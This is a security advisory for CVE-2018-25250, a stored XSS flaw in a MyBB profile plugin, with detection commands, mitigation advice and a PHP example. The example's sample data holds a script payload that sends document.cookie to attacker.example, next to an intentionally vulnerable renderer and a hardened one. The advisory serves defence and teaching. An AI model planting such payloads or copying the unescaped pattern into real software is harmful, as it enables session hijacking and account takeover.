Platform
php
Component
mybb-last-users-threads-in-profile
Fixed in
1.2.1
CVE-2018-25250 describes a persistent (stored) cross-site scripting (XSS) vulnerability in the MyBB Last User's Threads in Profile plugin. The plugin lists a member's most recent threads on their profile page, and the thread subjects reach the page without proper output encoding, so an attacker can plant script that runs in the browser of anyone who views the profile, enabling session hijacking or defacement. Version 1.2 of the plugin is affected; the fix ships in version 1.2.1, so upgrading the plugin resolves the issue.
To exploit it, an attacker creates a thread whose subject contains a script payload. Because the payload is stored with the thread, it fires every time someone visits the attacker's profile: the script executes in the visitor's browser within the forum's origin, where it can read cookies that are not HttpOnly, issue authenticated requests, redirect the visitor to a malicious site, or alter the page content. The impact ranges from nuisance to full account takeover, and it is greatest when the viewer is a moderator or administrator, since the script then acts with that account's privileges.
CVE-2018-25250 was publicly disclosed on 2026-04-04. There are currently no known active campaigns exploiting this specific vulnerability, but XSS flaws are routinely targeted, and since the injection point is simply a thread subject, a public proof of concept is likely to appear. This vulnerability is not currently listed on the CISA KEV catalog.
Administrators and users of MyBB forums running version 1.2 of the Last User's Threads in Profile plugin are at risk. Any member able to create a thread can plant the payload, and anyone who views that member's profile is a potential victim; forums where staff routinely review member profiles face the highest risk, because a hijacked administrator session gives control of the forum itself.
• Plugin files:
grep -rn "version" /var/www/mybb/plugins/lastusersthreads/
The check that originally appeared here, grep -r "<script" over the plugin directory, does not detect this vulnerability: the payload lives in thread subjects stored in the database, not in the plugin's source, and any legitimate JavaScript the plugin ships would match as well. What matters is the version the plugin declares (1.2 is affected, 1.2.1 is fixed); the MyBB Admin CP plugin list shows the same value.
• Generic web:
curl -I https://your-mybb-site.com/profile.php?uid=1 | grep Content-Type
This only confirms that the profile page is served. It cannot tell whether the plugin is installed or patched; to look for a payload that is already planted, review stored thread subjects for HTML tags instead.
Exploit Status
EPSS
0.03% (percentile 9%)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2018-25250 is to upgrade the MyBB Last User's Threads in Profile plugin to version 1.2.1 or later. If upgrading is not immediately feasible, note that the real fix for XSS is escaping on output: the thread subject must be HTML-encoded at the point where it is written into the profile page. Filtering or sanitizing thread subjects on input is only a stopgap, since subjects entered before the filter was added remain in the database. A web application firewall (WAF) with XSS rules adds a further layer but can be bypassed. Regularly review the MyBB forums and security advisories for updates and further guidance.
Update the MyBB Last User's Threads in Profile plugin to the latest available version, since version 1.2 is vulnerable and 1.2.1 contains the fix. Check the plugin's download page or the MyBB forum for the updated release. If the plugin is not essential, disable it until the update has been applied.
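The following PHP is an added illustration, not the plugin's own code: it shows the unsafe pattern this advisory describes (a stored thread subject concatenated straight into profile HTML) next to the hardened version that encodes on output. The `$threads` rows, the function names and the `showthread.php?tid=` link format are assumptions chosen for the example; the real plugin renders through MyBB's template system rather than string concatenation.

```php
<?php
// Added example (not code from the MyBB plugin): stored XSS via thread
// subjects rendered into a profile page, and the output-encoding fix.

// Constructed sample rows, shaped like what a plugin might fetch from the
// forum's threads table for one member. The second subject is a payload.
$threads = [
    ['tid' => 101, 'subject' => 'Hello world'],
    ['tid' => 102, 'subject' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'],
];

// Vulnerable pattern: the raw subject is concatenated into HTML, so a
// subject containing <script> becomes live markup for every profile viewer.
function render_vulnerable(array $threads): string
{
    $html = '<ul>';
    foreach ($threads as $t) {
        $html .= '<li><a href="showthread.php?tid=' . $t['tid'] . '">'
               . $t['subject'] . '</a></li>';
    }
    return $html . '</ul>';
}

// Hardened pattern: encode at the point of output. htmlspecialchars turns
// < > & " ' into entities, so the browser shows the payload as text. The
// tid is cast to int so the href cannot carry injected attributes either.
function render_safe(array $threads): string
{
    $html = '<ul>';
    foreach ($threads as $t) {
        $tid = (int) $t['tid'];
        $subject = htmlspecialchars($t['subject'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $html .= '<li><a href="showthread.php?tid=' . $tid . '">'
               . $subject . '</a></li>';
    }
    return $html . '</ul>';
}

echo "Vulnerable:\n", render_vulnerable($threads), "\n\n";
echo "Hardened:\n", render_safe($threads), "\n";
```

Run it with `php example.php`: the vulnerable output contains the `<script>` element intact, while the hardened output contains `&lt;script&gt;`. Filtering the subject when the thread is created would not have helped a forum that already had such a thread stored, which is why the fix belongs at output time.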
CVE-2018-25250 is a cross-site scripting (XSS) vulnerability affecting the MyBB Last User's Threads in Profile Plugin, allowing attackers to inject malicious scripts into user profiles.
You are affected if you are using version 1.2 of the MyBB Last User's Threads in Profile plugin. Upgrade to version 1.2.1 or later to resolve the vulnerability.
Upgrade the MyBB Last User's Threads in Profile plugin to the latest available version (1.2.1 or later). Output encoding of thread subjects, input filtering and WAF rules can provide temporary mitigation until the upgrade is applied.
There are currently no confirmed reports of active exploitation, but XSS vulnerabilities are frequently targeted, and exploitation is possible.
Refer to the MyBB forums and security advisories for the latest information and updates regarding CVE-2018-25250.